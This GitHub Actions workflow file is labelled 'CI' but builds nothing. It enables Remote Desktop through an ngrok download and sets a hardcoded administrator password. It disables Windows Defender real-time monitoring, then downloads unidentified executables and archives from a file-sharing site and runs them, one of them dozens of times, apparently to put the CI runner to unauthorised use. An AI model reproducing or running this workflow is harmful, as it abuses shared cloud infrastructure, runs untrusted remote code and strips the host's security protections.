name: CI

on: [push, workflow_dispatch]

jobs:

  build:
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract
      run: Expand-Archive ngrok.zip
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Ur RDP is working go connect xD!
      run: New-Item -Path "C:\21" -ItemType Directory
    - name: Ur RDP is working go connect xD!
      run: New-Item -Path "C:\2" -ItemType Directory
    - name: Download
      run: New-Item -Path "C:\1" -ItemType Directory
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/ZB4hgS1d/8Gz3iran.ddf6f2f4889ed0a3de58bd9bbab005ee -outfile c:\21\RegMikroMan222.zip
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/zt-J-18H/CZwOOHmv.64189650a95162a2ef7146b4e2b5e2af -outfile c:\ffs_msdn_in_english-2.3.0.xpi
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/1RcjbhMY/8Gz3iran.cdcce986dbe013ff01b264b1ec9a403d -outfile c:\21\cm413_64.zip
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/8FukEB25/8Gz3iran.4b556a4802cd6bdaf4f5ad74459e2bdb -outfile c:\21\start.exe
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\RegMikroMan222.zip" -DestinationPath "C:\21"
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\cm413_64.zip" -DestinationPath "C:\21"
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "C:\21\start.exe"'
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell -ArgumentList '-Noexit -Command "C:\21\cm413_64\Clickermannv4.13x64\Clickermann.exe" "C:\21\cm413_64\Clickermannv4.13x64\2211.cms"'
    - name: Tunnels.
      run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Tunnels.
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: Download
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/_SJ5umsh/PSpW8EoQ.c3ec689c09a1f30fbfc498fa68c478e9 -outfile c:\21\1122.exe
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "c:\21\1122.exe"'
    - name: Create Tunnel
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/FVaeI20Q/8Gz3iran.dcd3c1351bd40fef9d17a7a64f33ff53 -outfile c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
